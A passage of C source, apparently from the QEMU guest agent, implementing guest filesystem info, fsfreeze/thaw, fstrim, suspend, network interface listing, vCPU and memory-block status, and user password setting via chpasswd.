GUEST_DISK_BUS_TYPE_IDE; disk->bus = i; disk->unit = tgt[1]; break; } } if (i >= nhosts) { g_debug("no host for '%s' (driver '%s')", syspath, driver); goto cleanup; } } else if (strcmp(driver, "sym53c8xx") == 0) { /* scsi(LSI Logic): target*:0:<unit>:0 */ if (!has_tgt) { g_debug("invalid sysfs path '%s' (driver '%s')", syspath, driver); goto cleanup; } disk->bus_type = GUEST_DISK_BUS_TYPE_SCSI; disk->unit = tgt[1]; } else if (strcmp(driver, "virtio-pci") == 0) { if (has_tgt) { /* virtio-scsi: target*:0:0:<unit> */ disk->bus_type = GUEST_DISK_BUS_TYPE_SCSI; disk->unit = tgt[2]; } else { /* virtio-blk: 1 disk per 1 device */ disk->bus_type = GUEST_DISK_BUS_TYPE_VIRTIO; } } else if (strcmp(driver, "ahci") == 0) { /* ahci: 1 host per 1 unit */ if (!has_host || !has_tgt) { g_debug("invalid sysfs path '%s' (driver '%s')", syspath, driver); goto cleanup; } for (i = 0; i < nhosts; i++) { if (host == hosts[i]) { disk->unit = i; disk->bus_type = GUEST_DISK_BUS_TYPE_SATA; break; } } if (i >= nhosts) { g_debug("no host for '%s' (driver '%s')", syspath, driver); goto cleanup; } } else { g_debug("unknown driver '%s' (sysfs path '%s')", driver, syspath); goto cleanup; } list->next = fs->disk; fs->disk = list; goto out; cleanup: if (list) { qapi_free_GuestDiskAddressList(list); } out: g_free(driver); #ifdef CONFIG_LIBUDEV udev_unref(udev); udev_device_unref(udevice); #endif return; } static void build_guest_fsinfo_for_device(char const *devpath, GuestFilesystemInfo *fs, Error **errp); /* Store a list of slave devices of virtual volume specified by @syspath into * @fs */ static void build_guest_fsinfo_for_virtual_device(char const *syspath, GuestFilesystemInfo *fs, Error **errp) { DIR *dir; char *dirpath; struct dirent *entry; dirpath = g_strdup_printf("%s/slaves", syspath); dir = opendir(dirpath); if (!dir) { if (errno != ENOENT) { error_setg_errno(errp, errno, "opendir(\"%s\")", dirpath); } g_free(dirpath); return; } for (;;) { errno = 0; entry = readdir(dir); if (entry == NULL) { if (errno) { error_setg_errno(errp, errno, "readdir(\"%s\")", dirpath); } break; } if (entry->d_type == DT_LNK) { char *path; g_debug(" slave device '%s'", entry->d_name); path = g_strdup_printf("%s/slaves/%s", syspath, entry->d_name); build_guest_fsinfo_for_device(path, fs, errp); g_free(path); if (*errp) { break; } } } g_free(dirpath); closedir(dir); } /* Dispatch to functions for virtual/real device */ static void build_guest_fsinfo_for_device(char const *devpath, GuestFilesystemInfo *fs, Error **errp) { char *syspath = realpath(devpath, NULL); if (!syspath) { error_setg_errno(errp, errno, "realpath(\"%s\")", devpath); return; } if (!fs->name) { fs->name = g_path_get_basename(syspath); } g_debug(" parse sysfs path '%s'", syspath); if (strstr(syspath, "/devices/virtual/block/")) { build_guest_fsinfo_for_virtual_device(syspath, fs, errp); } else { build_guest_fsinfo_for_real_device(syspath, fs, errp); } free(syspath); } /* Return a list of the disk device(s)' info which @mount lies on */ static GuestFilesystemInfo *build_guest_fsinfo(struct FsMount *mount, Error **errp) { GuestFilesystemInfo *fs = g_malloc0(sizeof(*fs)); struct statvfs buf; unsigned long used, nonroot_total, fr_size; char *devpath = g_strdup_printf("/sys/dev/block/%u:%u", mount->devmajor, mount->devminor); fs->mountpoint = g_strdup(mount->dirname); fs->type = g_strdup(mount->devtype); build_guest_fsinfo_for_device(devpath, fs, errp); if (statvfs(fs->mountpoint, &buf) == 0) { fr_size = buf.f_frsize; used = buf.f_blocks - buf.f_bfree; nonroot_total = used + buf.f_bavail; fs->used_bytes = used * fr_size; fs->total_bytes = nonroot_total * fr_size; fs->has_total_bytes = true; fs->has_used_bytes = true; } g_free(devpath); return fs; } GuestFilesystemInfoList *qmp_guest_get_fsinfo(Error **errp) { FsMountList mounts; struct FsMount *mount; GuestFilesystemInfoList *new, *ret = NULL; Error *local_err = NULL; QTAILQ_INIT(&mounts); build_fs_mount_list(&mounts, &local_err); if (local_err) { error_propagate(errp, local_err); return NULL; } QTAILQ_FOREACH(mount, &mounts, next) { g_debug("Building guest fsinfo for '%s'", mount->dirname); new = g_malloc0(sizeof(*ret)); new->value = build_guest_fsinfo(mount, &local_err); new->next = ret; ret = new; if (local_err) { error_propagate(errp, local_err); qapi_free_GuestFilesystemInfoList(ret); ret = NULL; break; } } free_fs_mount_list(&mounts); return ret; } typedef enum { FSFREEZE_HOOK_THAW = 0, FSFREEZE_HOOK_FREEZE, } FsfreezeHookArg; static const char *fsfreeze_hook_arg_string[] = { "thaw", "freeze", }; static void execute_fsfreeze_hook(FsfreezeHookArg arg, Error **errp) { int status; pid_t pid; const char *hook; const char *arg_str = fsfreeze_hook_arg_string[arg]; Error *local_err = NULL; hook = ga_fsfreeze_hook(ga_state); if (!hook) { return; } if (access(hook, X_OK) != 0) { error_setg_errno(errp, errno, "can't access fsfreeze hook '%s'", hook); return; } slog("executing fsfreeze hook with arg '%s'", arg_str); pid = fork(); if (pid == 0) { setsid(); reopen_fd_to_null(0); reopen_fd_to_null(1); reopen_fd_to_null(2); execle(hook, hook, arg_str, NULL, environ); _exit(EXIT_FAILURE); } else if (pid < 0) { error_setg_errno(errp, errno, "failed to create child process"); return; } ga_wait_child(pid, &status, &local_err); if (local_err) { error_propagate(errp, local_err); return; } if (!WIFEXITED(status)) { error_setg(errp, "fsfreeze hook has terminated abnormally"); return; } status = WEXITSTATUS(status); if (status) { error_setg(errp, "fsfreeze hook has failed with status %d", status); return; } } /* * Return status of freeze/thaw */ GuestFsfreezeStatus qmp_guest_fsfreeze_status(Error **errp) { if (ga_is_frozen(ga_state)) { return GUEST_FSFREEZE_STATUS_FROZEN; } return GUEST_FSFREEZE_STATUS_THAWED; } int64_t qmp_guest_fsfreeze_freeze(Error **errp) { return qmp_guest_fsfreeze_freeze_list(false, NULL, errp); } /* * Walk list of mounted file systems in the guest, and freeze the ones which * are real local file systems. */ int64_t qmp_guest_fsfreeze_freeze_list(bool has_mountpoints, strList *mountpoints, Error **errp) { int ret = 0, i = 0; strList *list; FsMountList mounts; struct FsMount *mount; Error *local_err = NULL; int fd; slog("guest-fsfreeze called"); execute_fsfreeze_hook(FSFREEZE_HOOK_FREEZE, &local_err); if (local_err) { error_propagate(errp, local_err); return -1; } QTAILQ_INIT(&mounts); build_fs_mount_list(&mounts, &local_err); if (local_err) { error_propagate(errp, local_err); return -1; } /* cannot risk guest agent blocking itself on a write in this state */ ga_set_frozen(ga_state); QTAILQ_FOREACH_REVERSE(mount, &mounts, FsMountList, next) { /* To issue fsfreeze in the reverse order of mounts, check if the * mount is listed in the list here */ if (has_mountpoints) { for (list = mountpoints; list; list = list->next) { if (strcmp(list->value, mount->dirname) == 0) { break; } } if (!list) { continue; } } fd = qemu_open(mount->dirname, O_RDONLY); if (fd == -1) { error_setg_errno(errp, errno, "failed to open %s", mount->dirname); goto error; } /* we try to cull filesystems we know won't work in advance, but other * filesystems may not implement fsfreeze for less obvious reasons. * these will report EOPNOTSUPP. we simply ignore these when tallying * the number of frozen filesystems. * if a filesystem is mounted more than once (aka bind mount) a * consecutive attempt to freeze an already frozen filesystem will * return EBUSY. * * any other error means a failure to freeze a filesystem we * expect to be freezable, so return an error in those cases * and return system to thawed state. */ ret = ioctl(fd, FIFREEZE); if (ret == -1) { if (errno != EOPNOTSUPP && errno != EBUSY) { error_setg_errno(errp, errno, "failed to freeze %s", mount->dirname); close(fd); goto error; } } else { i++; } close(fd); } free_fs_mount_list(&mounts); /* We may not issue any FIFREEZE here. * Just unset ga_state here and ready for the next call. */ if (i == 0) { ga_unset_frozen(ga_state); } return i; error: free_fs_mount_list(&mounts); qmp_guest_fsfreeze_thaw(NULL); return 0; } /* * Walk list of frozen file systems in the guest, and thaw them. */ int64_t qmp_guest_fsfreeze_thaw(Error **errp) { int ret; FsMountList mounts; FsMount *mount; int fd, i = 0, logged; Error *local_err = NULL; QTAILQ_INIT(&mounts); build_fs_mount_list(&mounts, &local_err); if (local_err) { error_propagate(errp, local_err); return 0; } QTAILQ_FOREACH(mount, &mounts, next) { logged = false; fd = qemu_open(mount->dirname, O_RDONLY); if (fd == -1) { continue; } /* we have no way of knowing whether a filesystem was actually unfrozen * as a result of a successful call to FITHAW, only that if an error * was returned the filesystem was *not* unfrozen by that particular * call. * * since multiple preceding FIFREEZEs require multiple calls to FITHAW * to unfreeze, continuing issuing FITHAW until an error is returned, * in which case either the filesystem is in an unfreezable state, or, * more likely, it was thawed previously (and remains so afterward). * * also, since the most recent successful call is the one that did * the actual unfreeze, we can use this to provide an accurate count * of the number of filesystems unfrozen by guest-fsfreeze-thaw, which * may * be useful for determining whether a filesystem was unfrozen * during the freeze/thaw phase by a process other than qemu-ga. */ do { ret = ioctl(fd, FITHAW); if (ret == 0 && !logged) { i++; logged = true; } } while (ret == 0); close(fd); } ga_unset_frozen(ga_state); free_fs_mount_list(&mounts); execute_fsfreeze_hook(FSFREEZE_HOOK_THAW, errp); return i; } static void guest_fsfreeze_cleanup(void) { Error *err = NULL; if (ga_is_frozen(ga_state) == GUEST_FSFREEZE_STATUS_FROZEN) { qmp_guest_fsfreeze_thaw(&err); if (err) { slog("failed to clean up frozen filesystems: %s", error_get_pretty(err)); error_free(err); } } } #endif /* CONFIG_FSFREEZE */ #if defined(CONFIG_FSTRIM) /* * Walk list of mounted file systems in the guest, and trim them. */ GuestFilesystemTrimResponse * qmp_guest_fstrim(bool has_minimum, int64_t minimum, Error **errp) { GuestFilesystemTrimResponse *response; GuestFilesystemTrimResultList *list; GuestFilesystemTrimResult *result; int ret = 0; FsMountList mounts; struct FsMount *mount; int fd; Error *local_err = NULL; struct fstrim_range r; slog("guest-fstrim called"); QTAILQ_INIT(&mounts); build_fs_mount_list(&mounts, &local_err); if (local_err) { error_propagate(errp, local_err); return NULL; } response = g_malloc0(sizeof(*response)); QTAILQ_FOREACH(mount, &mounts, next) { result = g_malloc0(sizeof(*result)); result->path = g_strdup(mount->dirname); list = g_malloc0(sizeof(*list)); list->value = result; list->next = response->paths; response->paths = list; fd = qemu_open(mount->dirname, O_RDONLY); if (fd == -1) { result->error = g_strdup_printf("failed to open: %s", strerror(errno)); result->has_error = true; continue; } /* We try to cull filesystems we know won't work in advance, but other * filesystems may not implement fstrim for less obvious reasons. * These will report EOPNOTSUPP; while in some other cases ENOTTY * will be reported (e.g. CD-ROMs). * Any other error means an unexpected error. */ r.start = 0; r.len = -1; r.minlen = has_minimum ? minimum : 0; ret = ioctl(fd, FITRIM, &r); if (ret == -1) { result->has_error = true; if (errno == ENOTTY || errno == EOPNOTSUPP) { result->error = g_strdup("trim not supported"); } else { result->error = g_strdup_printf("failed to trim: %s", strerror(errno)); } close(fd); continue; } result->has_minimum = true; result->minimum = r.minlen; result->has_trimmed = true; result->trimmed = r.len; close(fd); } free_fs_mount_list(&mounts); return response; } #endif /* CONFIG_FSTRIM */ #define LINUX_SYS_STATE_FILE "/sys/power/state" #define SUSPEND_SUPPORTED 0 #define SUSPEND_NOT_SUPPORTED 1 typedef enum { SUSPEND_MODE_DISK = 0, SUSPEND_MODE_RAM = 1, SUSPEND_MODE_HYBRID = 2, } SuspendMode; /* * Executes a command in a child process using g_spawn_sync, * returning an int >= 0 representing the exit status of the * process. * * If the program wasn't found in path, returns -1. * * If a problem happened when creating the child process, * returns -1 and errp is set. */ static int run_process_child(const char *command[], Error **errp) { int exit_status, spawn_flag; GError *g_err = NULL; bool success; spawn_flag = G_SPAWN_SEARCH_PATH | G_SPAWN_STDOUT_TO_DEV_NULL | G_SPAWN_STDERR_TO_DEV_NULL; success = g_spawn_sync(NULL, (char **)command, environ, spawn_flag, NULL, NULL, NULL, NULL, &exit_status, &g_err); if (success) { return WEXITSTATUS(exit_status); } if (g_err && (g_err->code != G_SPAWN_ERROR_NOENT)) { error_setg(errp, "failed to create child process, error '%s'", g_err->message); } g_error_free(g_err); return -1; } static bool systemd_supports_mode(SuspendMode mode, Error **errp) { Error *local_err = NULL; const char *systemctl_args[3] = {"systemd-hibernate", "systemd-suspend", "systemd-hybrid-sleep"}; const char *cmd[4] = {"systemctl", "status", systemctl_args[mode], NULL}; int status; status = run_process_child(cmd, &local_err); /* * systemctl status uses LSB return codes so we can expect * status > 0 and be ok. To assert if the guest has support * for the selected suspend mode, status should be < 4. 4 is * the code for unknown service status, the return value when * the service does not exist. A common value is status = 3 * (program is not running). */ if (status > 0 && status < 4) { return true; } if (local_err) { error_propagate(errp, local_err); } return false; } static void systemd_suspend(SuspendMode mode, Error **errp) { Error *local_err = NULL; const char *systemctl_args[3] = {"hibernate", "suspend", "hybrid-sleep"}; const char *cmd[3] = {"systemctl", systemctl_args[mode], NULL}; int status; status = run_process_child(cmd, &local_err); if (status == 0) { return; } if ((status == -1) && !local_err) { error_setg(errp, "the helper program 'systemctl %s' was not found", systemctl_args[mode]); return; } if (local_err) { error_propagate(errp, local_err); } else { error_setg(errp, "the helper program 'systemctl %s' returned an " "unexpected exit status code (%d)", systemctl_args[mode], status); } } static bool pmutils_supports_mode(SuspendMode mode, Error **errp) { Error *local_err = NULL; const char *pmutils_args[3] = {"--hibernate", "--suspend", "--suspend-hybrid"}; const char *cmd[3] = {"pm-is-supported", pmutils_args[mode], NULL}; int status; status = run_process_child(cmd, &local_err); if (status == SUSPEND_SUPPORTED) { return true; } if ((status == -1) && !local_err) { return false; } if (local_err) { error_propagate(errp, local_err); } else { error_setg(errp, "the helper program '%s' returned an unexpected exit" " status code (%d)", "pm-is-supported", status); } return false; } static void pmutils_suspend(SuspendMode mode, Error **errp) { Error *local_err = NULL; const char *pmutils_binaries[3] = {"pm-hibernate", "pm-suspend", "pm-suspend-hybrid"}; const char *cmd[2] = {pmutils_binaries[mode], NULL}; int status; status = run_process_child(cmd, &local_err); if (status == 0) { return; } if ((status == -1) && !local_err) { error_setg(errp, "the helper program '%s' was not found", pmutils_binaries[mode]); return; } if (local_err) { error_propagate(errp, local_err); } else { error_setg(errp, "the helper program '%s' returned an unexpected exit" " status code (%d)", pmutils_binaries[mode], status); } } static bool linux_sys_state_supports_mode(SuspendMode mode, Error **errp) { const char *sysfile_strs[3] = {"disk", "mem", NULL}; const char *sysfile_str = sysfile_strs[mode]; char buf[32]; /* hopefully big enough */ int fd; ssize_t ret; if (!sysfile_str) { error_setg(errp, "unknown guest suspend mode"); return false; } fd = open(LINUX_SYS_STATE_FILE, O_RDONLY); if (fd < 0) { return false; } ret = read(fd, buf, sizeof(buf) - 1); close(fd); if (ret <= 0) { return false; } buf[ret] = '\0'; if (strstr(buf, sysfile_str)) { return true; } return false; } static void linux_sys_state_suspend(SuspendMode mode, Error **errp) { Error *local_err = NULL; const char *sysfile_strs[3] = {"disk", "mem", NULL}; const char *sysfile_str = sysfile_strs[mode]; pid_t pid; int status; if (!sysfile_str) { error_setg(errp, "unknown guest suspend mode"); return; } pid = fork(); if (!pid) { /* child */ int fd; setsid(); reopen_fd_to_null(0); reopen_fd_to_null(1); reopen_fd_to_null(2); fd = open(LINUX_SYS_STATE_FILE, O_WRONLY); if (fd < 0) { _exit(EXIT_FAILURE); } if (write(fd, sysfile_str, strlen(sysfile_str)) < 0) { _exit(EXIT_FAILURE); } _exit(EXIT_SUCCESS); } else if (pid < 0) { error_setg_errno(errp, errno, "failed to create child process"); return; } ga_wait_child(pid, &status, &local_err); if (local_err) { error_propagate(errp, local_err); return; } if (WEXITSTATUS(status)) { error_setg(errp, "child process has failed to suspend"); } } static void guest_suspend(SuspendMode mode, Error **errp) { Error *local_err = NULL; bool mode_supported = false; if (systemd_supports_mode(mode, &local_err)) { mode_supported = true; systemd_suspend(mode, &local_err); } if (!local_err) { return; } error_free(local_err); if (pmutils_supports_mode(mode, &local_err)) { mode_supported = true; pmutils_suspend(mode, &local_err); } if (!local_err) { return; } error_free(local_err); if (linux_sys_state_supports_mode(mode, &local_err)) { mode_supported = true; linux_sys_state_suspend(mode, &local_err); } if (!mode_supported) { error_setg(errp, "the requested suspend mode is not supported by the guest"); } else if (local_err) { error_propagate(errp, local_err); } } void qmp_guest_suspend_disk(Error **errp) { guest_suspend(SUSPEND_MODE_DISK, errp); } void qmp_guest_suspend_ram(Error **errp) { guest_suspend(SUSPEND_MODE_RAM, errp); } void qmp_guest_suspend_hybrid(Error **errp) { guest_suspend(SUSPEND_MODE_HYBRID, errp); } static GuestNetworkInterfaceList * guest_find_interface(GuestNetworkInterfaceList *head, const char *name) { for (; head; head = head->next) { if (strcmp(head->value->name, name) == 0) { break; } } return head; } static int guest_get_network_stats(const char *name, GuestNetworkInterfaceStat *stats) { int name_len; char const *devinfo = "/proc/net/dev"; FILE *fp; char *line = NULL, *colon; size_t n = 0; fp = fopen(devinfo, "r"); if (!fp) { return -1; } name_len = strlen(name); while (getline(&line, &n, fp) != -1) { long long dummy; long long rx_bytes; long long rx_packets; long long rx_errs; long long rx_dropped; long long tx_bytes; long long tx_packets; long long tx_errs; long long tx_dropped; char *trim_line; trim_line = g_strchug(line); if (trim_line[0] == '\0') { continue; } colon = strchr(trim_line, ':'); if (!colon) { continue; } if (colon - name_len == trim_line && strncmp(trim_line, name, name_len) == 0) { if (sscanf(colon + 1, "%lld %lld %lld %lld %lld %lld %lld %lld %lld %lld %lld %lld %lld %lld %lld %lld", &rx_bytes, &rx_packets, &rx_errs, &rx_dropped, &dummy, &dummy, &dummy, &dummy, &tx_bytes, &tx_packets, &tx_errs, &tx_dropped, &dummy, &dummy, &dummy, &dummy) != 16) { continue; } stats->rx_bytes = rx_bytes; stats->rx_packets = rx_packets; stats->rx_errs = rx_errs; stats->rx_dropped = rx_dropped; stats->tx_bytes = tx_bytes; stats->tx_packets = tx_packets; stats->tx_errs = tx_errs; stats->tx_dropped = tx_dropped; fclose(fp); g_free(line); return 0; } } fclose(fp); g_free(line); g_debug("/proc/net/dev: Interface '%s' not found", name); return -1; } /* * Build information about guest interfaces */ GuestNetworkInterfaceList *qmp_guest_network_get_interfaces(Error **errp) { GuestNetworkInterfaceList *head = NULL, *cur_item = NULL; struct ifaddrs *ifap, *ifa; if (getifaddrs(&ifap) < 0) { error_setg_errno(errp, errno, "getifaddrs failed"); goto error; } for (ifa = ifap; ifa; ifa = ifa->ifa_next) { GuestNetworkInterfaceList *info; GuestIpAddressList **address_list = NULL, *address_item = NULL; GuestNetworkInterfaceStat *interface_stat = NULL; char addr4[INET_ADDRSTRLEN]; char addr6[INET6_ADDRSTRLEN]; int sock; struct ifreq ifr; unsigned char *mac_addr; void *p; g_debug("Processing %s interface", ifa->ifa_name); info = guest_find_interface(head, ifa->ifa_name); if (!info) { info = g_malloc0(sizeof(*info)); info->value = g_malloc0(sizeof(*info->value)); info->value->name = g_strdup(ifa->ifa_name); if (!cur_item) { head = cur_item = info; } else { cur_item->next = info; cur_item = info; } } if (!info->value->has_hardware_address && ifa->ifa_flags & SIOCGIFHWADDR) { /* we haven't obtained HW address yet */ sock = socket(PF_INET, SOCK_STREAM, 0); if (sock == -1) { error_setg_errno(errp, errno, "failed to create socket"); goto error; } memset(&ifr, 0, sizeof(ifr)); pstrcpy(ifr.ifr_name, IF_NAMESIZE, info->value->name); if (ioctl(sock, SIOCGIFHWADDR, &ifr) == -1) { error_setg_errno(errp, errno, "failed to get MAC address of %s", ifa->ifa_name); close(sock); goto error; } close(sock); mac_addr = (unsigned char *) &ifr.ifr_hwaddr.sa_data; info->value->hardware_address = g_strdup_printf("%02x:%02x:%02x:%02x:%02x:%02x", (int) mac_addr[0], (int) mac_addr[1], (int) mac_addr[2], (int) mac_addr[3], (int) mac_addr[4], (int) mac_addr[5]); info->value->has_hardware_address = true; } if (ifa->ifa_addr && ifa->ifa_addr->sa_family == AF_INET) { /* interface with IPv4 address */ p = &((struct sockaddr_in *)ifa->ifa_addr)->sin_addr; if (!inet_ntop(AF_INET, p, addr4, sizeof(addr4))) { error_setg_errno(errp, errno, "inet_ntop failed"); goto error; } address_item = g_malloc0(sizeof(*address_item)); address_item->value = g_malloc0(sizeof(*address_item->value)); address_item->value->ip_address = g_strdup(addr4); address_item->value->ip_address_type = GUEST_IP_ADDRESS_TYPE_IPV4; if (ifa->ifa_netmask) { /* Count the number of set bits in netmask. * This is safe as '1' and '0' cannot be shuffled in netmask. */ p = &((struct sockaddr_in *)ifa->ifa_netmask)->sin_addr; address_item->value->prefix = ctpop32(((uint32_t *) p)[0]); } } else if (ifa->ifa_addr && ifa->ifa_addr->sa_family == AF_INET6) { /* interface with IPv6 address */ p = &((struct sockaddr_in6 *)ifa->ifa_addr)->sin6_addr; if (!inet_ntop(AF_INET6, p, addr6, sizeof(addr6))) { error_setg_errno(errp, errno, "inet_ntop failed"); goto error; } address_item = g_malloc0(sizeof(*address_item)); address_item->value = g_malloc0(sizeof(*address_item->value)); address_item->value->ip_address = g_strdup(addr6); address_item->value->ip_address_type = GUEST_IP_ADDRESS_TYPE_IPV6; if (ifa->ifa_netmask) { /* Count the number of set bits in netmask. * This is safe as '1' and '0' cannot be shuffled in netmask. */ p = &((struct sockaddr_in6 *)ifa->ifa_netmask)->sin6_addr; address_item->value->prefix = ctpop32(((uint32_t *) p)[0]) + ctpop32(((uint32_t *) p)[1]) + ctpop32(((uint32_t *) p)[2]) + ctpop32(((uint32_t *) p)[3]); } } if (!address_item) { continue; } address_list = &info->value->ip_addresses; while (*address_list && (*address_list)->next) { address_list = &(*address_list)->next; } if (!*address_list) { *address_list = address_item; } else { (*address_list)->next = address_item; } info->value->has_ip_addresses = true; if (!info->value->has_statistics) { interface_stat = g_malloc0(sizeof(*interface_stat)); if (guest_get_network_stats(info->value->name, interface_stat) == -1) { info->value->has_statistics = false; g_free(interface_stat); } else { info->value->statistics = interface_stat; info->value->has_statistics = true; } } } freeifaddrs(ifap); return head; error: freeifaddrs(ifap); qapi_free_GuestNetworkInterfaceList(head); return NULL; } #define SYSCONF_EXACT(name, errp) sysconf_exact((name), #name, (errp)) static long sysconf_exact(int name, const char *name_str, Error **errp) { long ret; errno = 0; ret = sysconf(name); if (ret == -1) { if (errno == 0) { error_setg(errp, "sysconf(%s): value indefinite", name_str); } else { error_setg_errno(errp, errno, "sysconf(%s)", name_str); } } return ret; } /* Transfer online/offline status between @vcpu and the guest system. * * On input either @errp or *@errp must be NULL. * * In system-to-@vcpu direction, the following @vcpu fields are accessed: * - R: vcpu->logical_id * - W: vcpu->online * - W: vcpu->can_offline * * In @vcpu-to-system direction, the following @vcpu fields are accessed: * - R: vcpu->logical_id * - R: vcpu->online * * Written members remain unmodified on error. */ static void transfer_vcpu(GuestLogicalProcessor *vcpu, bool sys2vcpu, char *dirpath, Error **errp) { int fd; int res; int dirfd; static const char fn[] = "online"; dirfd = open(dirpath, O_RDONLY | O_DIRECTORY); if (dirfd == -1) { error_setg_errno(errp, errno, "open(\"%s\")", dirpath); return; } fd = openat(dirfd, fn, sys2vcpu ? O_RDONLY : O_RDWR); if (fd == -1) { if (errno != ENOENT) { error_setg_errno(errp, errno, "open(\"%s/%s\")", dirpath, fn); } else if (sys2vcpu) { vcpu->online = true; vcpu->can_offline = false; } else if (!vcpu->online) { error_setg(errp, "logical processor #%" PRId64 " can't be " "offlined", vcpu->logical_id); } /* otherwise pretend successful re-onlining */ } else { unsigned char status; res = pread(fd, &status, 1, 0); if (res == -1) { error_setg_errno(errp, errno, "pread(\"%s/%s\")", dirpath, fn); } else if (res == 0) { error_setg(errp, "pread(\"%s/%s\"): unexpected EOF", dirpath, fn); } else if (sys2vcpu) { vcpu->online = (status != '0'); vcpu->can_offline = true; } else if (vcpu->online != (status != '0')) { status = '0' + vcpu->online; if (pwrite(fd, &status, 1, 0) == -1) { error_setg_errno(errp, errno, "pwrite(\"%s/%s\")", dirpath, fn); } } /* otherwise pretend successful re-(on|off)-lining */ res = close(fd); g_assert(res == 0); } res = close(dirfd); g_assert(res == 0); } GuestLogicalProcessorList *qmp_guest_get_vcpus(Error **errp) { int64_t current; GuestLogicalProcessorList *head, **link; long sc_max; Error *local_err = NULL; current = 0; head = NULL; link = &head; sc_max = SYSCONF_EXACT(_SC_NPROCESSORS_CONF, &local_err); while (local_err == NULL && current < sc_max) { GuestLogicalProcessor *vcpu; GuestLogicalProcessorList *entry; int64_t id = current++; char *path = g_strdup_printf("/sys/devices/system/cpu/cpu%" PRId64 "/", id); if (g_file_test(path, G_FILE_TEST_EXISTS)) { vcpu = g_malloc0(sizeof *vcpu); vcpu->logical_id = id; vcpu->has_can_offline = true; /* lolspeak ftw */ transfer_vcpu(vcpu, true, path, &local_err); entry = g_malloc0(sizeof *entry); entry->value = vcpu; *link = entry; link = &entry->next; } g_free(path); } if (local_err == NULL) { /* there's no guest with zero VCPUs */ g_assert(head != NULL); return head; } qapi_free_GuestLogicalProcessorList(head); error_propagate(errp, local_err); return NULL; } int64_t qmp_guest_set_vcpus(GuestLogicalProcessorList *vcpus, Error **errp) { int64_t processed; Error *local_err = NULL; processed = 0; while (vcpus != NULL) { char *path = g_strdup_printf("/sys/devices/system/cpu/cpu%" PRId64 "/", vcpus->value->logical_id); transfer_vcpu(vcpus->value, false, path, &local_err); g_free(path); if (local_err != NULL) { break; } ++processed; vcpus = vcpus->next; } if (local_err != NULL) { if (processed == 0) { error_propagate(errp, local_err); } else { error_free(local_err); } } return processed; } void qmp_guest_set_user_password(const char *username, const char *password, bool crypted, Error **errp) { Error *local_err = NULL; char *passwd_path = NULL; pid_t pid; int status; int datafd[2] = { -1, -1 }; char *rawpasswddata = NULL; size_t rawpasswdlen; char *chpasswddata = NULL; size_t chpasswdlen; rawpasswddata = (char *)qbase64_decode(password, -1, &rawpasswdlen, errp); if (!rawpasswddata) { return; } rawpasswddata = g_renew(char, rawpasswddata, rawpasswdlen + 1); rawpasswddata[rawpasswdlen] = '\0'; if (strchr(rawpasswddata, '\n')) { error_setg(errp, "forbidden characters in raw password"); goto out; } if (strchr(username, '\n') || strchr(username, ':')) { error_setg(errp, "forbidden characters in username"); goto out; } chpasswddata = g_strdup_printf("%s:%s\n", username, rawpasswddata); chpasswdlen = strlen(chpasswddata); passwd_path = g_find_program_in_path("chpasswd"); if (!passwd_path) { error_setg(errp, "cannot find 'passwd' program in PATH"); goto out; } if (pipe(datafd) < 0) { error_setg(errp, "cannot create pipe FDs"); goto out; } pid = fork(); if (pid == 0) { close(datafd[1]); /* child */ setsid(); dup2(datafd[0], 0); reopen_fd_to_null(1); reopen_fd_to_null(2); if (crypted) { execle(passwd_path, "chpasswd", "-e", NULL, environ); } else { execle(passwd_path, "chpasswd", NULL, environ); } _exit(EXIT_FAILURE); } else if (pid < 0) { error_setg_errno(errp, errno, "failed to create child process"); goto out; } close(datafd[0]); datafd[0] = -1; if (qemu_write_full(datafd[1], chpasswddata, chpasswdlen) != chpasswdlen) { error_setg_errno(errp, errno, "cannot write new account password"); goto out; } close(datafd[1]); datafd[1] = -1; ga_wait_child(pid, &status, &local_err); if (local_err) { error_propagate(errp, local_err); goto out; } if (!WIFEXITED(status)) { error_setg(errp, "child process has terminated abnormally"); goto out; } if (WEXITSTATUS(status)) { error_setg(errp, "child process has failed to set user password"); goto out; } out: g_free(chpasswddata); g_free(rawpasswddata); g_free(passwd_path); if (datafd[0] != -1) { close(datafd[0]); } if (datafd[1] != -1) { close(datafd[1]); } } static void ga_read_sysfs_file(int dirfd, const char *pathname, char *buf, int size, Error **errp) { int fd; int res; errno = 0; fd = openat(dirfd, pathname, O_RDONLY); if (fd == -1) { error_setg_errno(errp, errno, "open sysfs file \"%s\"", pathname); return; } res = pread(fd, buf, size, 0); if (res == -1) { error_setg_errno(errp, errno, "pread sysfs file \"%s\"", pathname); } else if (res == 0) { error_setg(errp, "pread sysfs file \"%s\": unexpected EOF", pathname); } close(fd); } static void ga_write_sysfs_file(int dirfd, const char *pathname, const char *buf, int size, Error **errp) { int fd; errno = 0; fd = openat(dirfd, pathname, O_WRONLY); if (fd == -1) { error_setg_errno(errp, errno, "open sysfs file \"%s\"", pathname); return; } if (pwrite(fd, buf, size, 0) == -1) { error_setg_errno(errp, errno, "pwrite sysfs file \"%s\"", pathname); } close(fd); } /* Transfer online/offline status between @mem_blk and the guest system. * * On input either @errp or *@errp must be NULL. * * In system-to-@mem_blk direction, the following @mem_blk fields are accessed: * - R: mem_blk->phys_index * - W: mem_blk->online * - W: mem_blk->can_offline * * In @mem_blk-to-system direction, the following @mem_blk fields are accessed: * - R: mem_blk->phys_index * - R: mem_blk->online *- R: mem_blk->can_offline * Written members remain unmodified on error. */ static void transfer_memory_block(GuestMemoryBlock *mem_blk, bool sys2memblk, GuestMemoryBlockResponse *result, Error **errp) { char *dirpath; int dirfd; char *status; Error *local_err = NULL; if (!sys2memblk) { DIR *dp; if (!result) { error_setg(errp, "Internal error, 'result' should not be NULL"); return; } errno = 0; dp = opendir("/sys/devices/system/memory/"); /* if there is no 'memory' directory in sysfs, * we think this VM does not support online/offline memory block, * any other solution? */ if (!dp) { if (errno == ENOENT) { result->response = GUEST_MEMORY_BLOCK_RESPONSE_TYPE_OPERATION_NOT_SUPPORTED; } goto out1; } closedir(dp); } dirpath = g_strdup_printf("/sys/devices/system/memory/memory%" PRId64 "/", mem_blk->phys_index); dirfd = open(dirpath, O_RDONLY | O_DIRECTORY); if (dirfd == -1) { if (sys2memblk) { error_setg_errno(errp, errno, "open(\"%s\")", dirpath); } else { if (errno == ENOENT) { result->response = GUEST_MEMORY_BLOCK_RESPONSE_TYPE_NOT_FOUND; } else { result->response = GUEST_MEMORY_BLOCK_RESPONSE_TYPE_OPERATION_FAILED; } } g_free(dirpath); goto out1; } g_free(dirpath); status = g_malloc0(10); ga_read_sysfs_file(dirfd, "state", status, 10, &local_err); if (local_err) { /* treat with sysfs file that not exist in old kernel */ if (errno == ENOENT) { error_free(local_err); if (sys2memblk) { 